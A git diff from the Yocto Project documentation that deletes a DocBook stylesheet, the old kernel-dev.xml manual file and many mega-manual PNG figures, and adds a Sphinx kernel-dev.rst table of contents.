-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/kernel-dev/kernel-dev.rst b/documentation/kernel-dev/kernel-dev.rst
new file mode 100644
index 0000000000..55b42ed992
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev.rst
@@ -0,0 +1,21 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=============================================
+Yocto Project Linux Kernel Development Manual
+=============================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   kernel-dev-intro
+   kernel-dev-common
+   kernel-dev-advanced
+   kernel-dev-concepts-appx
+   kernel-dev-maint-appx
+   kernel-dev-faq
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/kernel-dev/kernel-dev.xml b/documentation/kernel-dev/kernel-dev.xml
deleted file mode 100755
index 76256c9c3e..0000000000
--- a/documentation/kernel-dev/kernel-dev.xml
+++ /dev/null
@@ -1,206 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='kernel-dev' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/kernel-dev-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-		  Yocto Project Linux Kernel Development Manual
-		</title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>The initial document released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Linux Kernel Development Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="kernel-dev-intro.xml"/>
-
-    <xi:include href="kernel-dev-common.xml"/>
-
-    <xi:include href="kernel-dev-advanced.xml"/>
-
-    <xi:include href="kernel-dev-concepts-appx.xml"/>
-
-    <xi:include href="kernel-dev-maint-appx.xml"/>
-
-    <xi:include href="kernel-dev-faq.xml"/>
-
-<!--    <index id='index'>
-      <title>Index</title>
-    </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/mega-manual/figures/YP-flow-diagram.png b/documentation/mega-manual/figures/YP-flow-diagram.png
deleted file mode 100644
index 35969038c9..0000000000
--- a/documentation/mega-manual/figures/YP-flow-diagram.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/add-variable.png b/documentation/mega-manual/figures/add-variable.png
deleted file mode 100644
index 6bdcca705a..0000000000
--- a/documentation/mega-manual/figures/add-variable.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/analysis-for-package-splitting.png b/documentation/mega-manual/figures/analysis-for-package-splitting.png
deleted file mode 100644
index 0cb038666b..0000000000
--- a/documentation/mega-manual/figures/analysis-for-package-splitting.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bash-oecore.png b/documentation/mega-manual/figures/bash-oecore.png
deleted file mode 100644
index 801a5d911f..0000000000
--- a/documentation/mega-manual/figures/bash-oecore.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bb_multiconfig_files.png b/documentation/mega-manual/figures/bb_multiconfig_files.png
deleted file mode 100644
index 041f06403b..0000000000
--- a/documentation/mega-manual/figures/bb_multiconfig_files.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bitbake-build-flow.png b/documentation/mega-manual/figures/bitbake-build-flow.png
deleted file mode 100644
index eb95eb3da0..0000000000
--- a/documentation/mega-manual/figures/bitbake-build-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bitbake-title.png b/documentation/mega-manual/figures/bitbake-title.png
deleted file mode 100644
index cb290154da..0000000000
--- a/documentation/mega-manual/figures/bitbake-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bsp-dev-flow.png b/documentation/mega-manual/figures/bsp-dev-flow.png
deleted file mode 100644
index 2ca1fecada..0000000000
--- a/documentation/mega-manual/figures/bsp-dev-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bsp-title.png b/documentation/mega-manual/figures/bsp-title.png
deleted file mode 100644
index f624dd4f94..0000000000
--- a/documentation/mega-manual/figures/bsp-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/build-workspace-directory.png b/documentation/mega-manual/figures/build-workspace-directory.png
deleted file mode 100644
index 5387d33f03..0000000000
--- a/documentation/mega-manual/figures/build-workspace-directory.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/buildhistory-web.png b/documentation/mega-manual/figures/buildhistory-web.png
deleted file mode 100644
index f6db86c977..0000000000
--- a/documentation/mega-manual/figures/buildhistory-web.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/buildhistory.png b/documentation/mega-manual/figures/buildhistory.png
deleted file mode 100644
index bd5f8a4908..0000000000
--- a/documentation/mega-manual/figures/buildhistory.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/building-an-image.png b/documentation/mega-manual/figures/building-an-image.png
deleted file mode 100755
index 1fbea5ab00..0000000000
--- a/documentation/mega-manual/figures/building-an-image.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/bypqs-title.png b/documentation/mega-manual/figures/bypqs-title.png
deleted file mode 100644
index 9e0a5ce52e..0000000000
--- a/documentation/mega-manual/figures/bypqs-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/compatible-layers.png b/documentation/mega-manual/figures/compatible-layers.png
deleted file mode 100644
index 38436b075c..0000000000
--- a/documentation/mega-manual/figures/compatible-layers.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/concepts-manual-title.png b/documentation/mega-manual/figures/concepts-manual-title.png
deleted file mode 100644
index bac7a69994..0000000000
--- a/documentation/mega-manual/figures/concepts-manual-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/configuration-compile-autoreconf.png b/documentation/mega-manual/figures/configuration-compile-autoreconf.png
deleted file mode 100644
index 043d195a33..0000000000
--- a/documentation/mega-manual/figures/configuration-compile-autoreconf.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/cross-development-toolchains.png b/documentation/mega-manual/figures/cross-development-toolchains.png
deleted file mode 100644
index cbe8371c05..0000000000
--- a/documentation/mega-manual/figures/cross-development-toolchains.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/cute-files-npm-example.png b/documentation/mega-manual/figures/cute-files-npm-example.png
deleted file mode 100644
index 1ebe74f535..0000000000
--- a/documentation/mega-manual/figures/cute-files-npm-example.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/define-generic.png b/documentation/mega-manual/figures/define-generic.png
deleted file mode 100644
index bd22718a55..0000000000
--- a/documentation/mega-manual/figures/define-generic.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/dev-title.png b/documentation/mega-manual/figures/dev-title.png
deleted file mode 100644
index 15e67d0744..0000000000
--- a/documentation/mega-manual/figures/dev-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/git-workflow.png b/documentation/mega-manual/figures/git-workflow.png
deleted file mode 100644
index e401330a12..0000000000
--- a/documentation/mega-manual/figures/git-workflow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/hosted-service.png b/documentation/mega-manual/figures/hosted-service.png
deleted file mode 100644
index 01fea7b245..0000000000
--- a/documentation/mega-manual/figures/hosted-service.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/image-generation.png b/documentation/mega-manual/figures/image-generation.png
deleted file mode 100644
index aff9fc27e0..0000000000
--- a/documentation/mega-manual/figures/image-generation.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/images.png b/documentation/mega-manual/figures/images.png
deleted file mode 100644
index 20c01307d5..0000000000
--- a/documentation/mega-manual/figures/images.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/import-layer.png b/documentation/mega-manual/figures/import-layer.png
deleted file mode 100644
index 436ec7af4a..0000000000
--- a/documentation/mega-manual/figures/import-layer.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/index-downloads.png b/documentation/mega-manual/figures/index-downloads.png
deleted file mode 100755
index d8d4475cee..0000000000
--- a/documentation/mega-manual/figures/index-downloads.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-architecture-overview.png b/documentation/mega-manual/figures/kernel-architecture-overview.png
deleted file mode 100755
index 2aad172db3..0000000000
--- a/documentation/mega-manual/figures/kernel-architecture-overview.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-dev-flow.png b/documentation/mega-manual/figures/kernel-dev-flow.png
deleted file mode 100644
index 793a395e8f..0000000000
--- a/documentation/mega-manual/figures/kernel-dev-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-dev-title.png b/documentation/mega-manual/figures/kernel-dev-title.png
deleted file mode 100644
index 7a8dd54372..0000000000
--- a/documentation/mega-manual/figures/kernel-dev-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-overview-1.png b/documentation/mega-manual/figures/kernel-overview-1.png
deleted file mode 100644
index 116c0b9bd4..0000000000
--- a/documentation/mega-manual/figures/kernel-overview-1.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-overview-2-generic.png b/documentation/mega-manual/figures/kernel-overview-2-generic.png
deleted file mode 100644
index ee2cdb206b..0000000000
--- a/documentation/mega-manual/figures/kernel-overview-2-generic.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernel-title.png b/documentation/mega-manual/figures/kernel-title.png
deleted file mode 100644
index 59d86c00dc..0000000000
--- a/documentation/mega-manual/figures/kernel-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernelshark-all.png b/documentation/mega-manual/figures/kernelshark-all.png
deleted file mode 100644
index 99b40bafe5..0000000000
--- a/documentation/mega-manual/figures/kernelshark-all.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernelshark-choose-events.png b/documentation/mega-manual/figures/kernelshark-choose-events.png
deleted file mode 100644
index e8dd62a571..0000000000
--- a/documentation/mega-manual/figures/kernelshark-choose-events.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernelshark-i915-display.png b/documentation/mega-manual/figures/kernelshark-i915-display.png
deleted file mode 100644
index bb0edfb7fd..0000000000
--- a/documentation/mega-manual/figures/kernelshark-i915-display.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/kernelshark-output-display.png b/documentation/mega-manual/figures/kernelshark-output-display.png
deleted file mode 100644
index ae2d0e5730..0000000000
--- a/documentation/mega-manual/figures/kernelshark-output-display.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/key-dev-elements.png b/documentation/mega-manual/figures/key-dev-elements.png
deleted file mode 100644
index 76c44050fd..0000000000
--- a/documentation/mega-manual/figures/key-dev-elements.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/layer-input.png b/documentation/mega-manual/figures/layer-input.png
deleted file mode 100644
index 29b56f9ea1..0000000000
--- a/documentation/mega-manual/figures/layer-input.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/mega-title.png b/documentation/mega-manual/figures/mega-title.png
deleted file mode 100644
index cde0b89a44..0000000000
--- a/documentation/mega-manual/figures/mega-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/multiconfig_files.png b/documentation/mega-manual/figures/multiconfig_files.png
deleted file mode 100644
index 0b59338b3a..0000000000
--- a/documentation/mega-manual/figures/multiconfig_files.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/new-project.png b/documentation/mega-manual/figures/new-project.png
deleted file mode 100644
index dbc50b9918..0000000000
--- a/documentation/mega-manual/figures/new-project.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/oprofileui-busybox.png b/documentation/mega-manual/figures/oprofileui-busybox.png
deleted file mode 100644
index a8275c65d2..0000000000
--- a/documentation/mega-manual/figures/oprofileui-busybox.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/oprofileui-copy-to-user.png b/documentation/mega-manual/figures/oprofileui-copy-to-user.png
deleted file mode 100644
index deb6470204..0000000000
--- a/documentation/mega-manual/figures/oprofileui-copy-to-user.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/oprofileui-downloading.png b/documentation/mega-manual/figures/oprofileui-downloading.png
deleted file mode 100644
index 57742d6723..0000000000
--- a/documentation/mega-manual/figures/oprofileui-downloading.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/oprofileui-processes.png b/documentation/mega-manual/figures/oprofileui-processes.png
deleted file mode 100644
index ae547028f4..0000000000
--- a/documentation/mega-manual/figures/oprofileui-processes.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/overview-manual-title.png b/documentation/mega-manual/figures/overview-manual-title.png
deleted file mode 100644
index 41e9012c4f..0000000000
--- a/documentation/mega-manual/figures/overview-manual-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/package-feeds.png b/documentation/mega-manual/figures/package-feeds.png
deleted file mode 100755
index 2668d3ddaf..0000000000
--- a/documentation/mega-manual/figures/package-feeds.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/patching.png b/documentation/mega-manual/figures/patching.png
deleted file mode 100644
index 80fba7e7cf..0000000000
--- a/documentation/mega-manual/figures/patching.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-probe-do_fork-profile.png b/documentation/mega-manual/figures/perf-probe-do_fork-profile.png
deleted file mode 100644
index 1a1070deb8..0000000000
--- a/documentation/mega-manual/figures/perf-probe-do_fork-profile.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-report-cycles-u.png b/documentation/mega-manual/figures/perf-report-cycles-u.png
deleted file mode 100644
index 68ec6af80b..0000000000
--- a/documentation/mega-manual/figures/perf-report-cycles-u.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-systemwide-libc.png b/documentation/mega-manual/figures/perf-systemwide-libc.png
deleted file mode 100644
index 2b72869c77..0000000000
--- a/documentation/mega-manual/figures/perf-systemwide-libc.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-systemwide.png b/documentation/mega-manual/figures/perf-systemwide.png
deleted file mode 100644
index 12ce2444ae..0000000000
--- a/documentation/mega-manual/figures/perf-systemwide.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png b/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png
deleted file mode 100644
index ceb34eaead..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png b/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png
deleted file mode 100644
index 3581e9daa6..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png b/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png
deleted file mode 100644
index c317b49a4e..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png b/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png
deleted file mode 100644
index 1913c867d0..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png b/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png
deleted file mode 100644
index a1962c437a..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png
deleted file mode 100644
index b642d06c8b..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-flat-stripped.png b/documentation/mega-manual/figures/perf-wget-flat-stripped.png
deleted file mode 100644
index c8f395ab53..0000000000
--- a/documentation/mega-manual/figures/perf-wget-flat-stripped.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png
deleted file mode 100644
index bb7c764ce0..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
deleted file mode 100644
index a799af5127..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png
deleted file mode 100644
index e91808ae40..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png
deleted file mode 100644
index 812302d0a8..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/poky-reference-distribution.png b/documentation/mega-manual/figures/poky-reference-distribution.png
deleted file mode 100644
index 1be89ae68e..0000000000
--- a/documentation/mega-manual/figures/poky-reference-distribution.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/poky-title.png b/documentation/mega-manual/figures/poky-title.png
deleted file mode 100644
index 2893d84620..0000000000
--- a/documentation/mega-manual/figures/poky-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/profile-title.png b/documentation/mega-manual/figures/profile-title.png
deleted file mode 100644
index ce5c682b58..0000000000
--- a/documentation/mega-manual/figures/profile-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png b/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png
deleted file mode 100644
index 2b6bfdacf9..0000000000
--- a/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png b/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png
deleted file mode 100644
index 444675c543..0000000000
--- a/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png b/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png
deleted file mode 100644
index 8ee35352d8..0000000000
--- a/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/recipe-workflow.png b/documentation/mega-manual/figures/recipe-workflow.png
deleted file mode 100644
index c0e960b13b..0000000000
--- a/documentation/mega-manual/figures/recipe-workflow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sched-wakeup-profile.png b/documentation/mega-manual/figures/sched-wakeup-profile.png
deleted file mode 100644
index 2f25811889..0000000000
--- a/documentation/mega-manual/figures/sched-wakeup-profile.png
+++ /dev/null
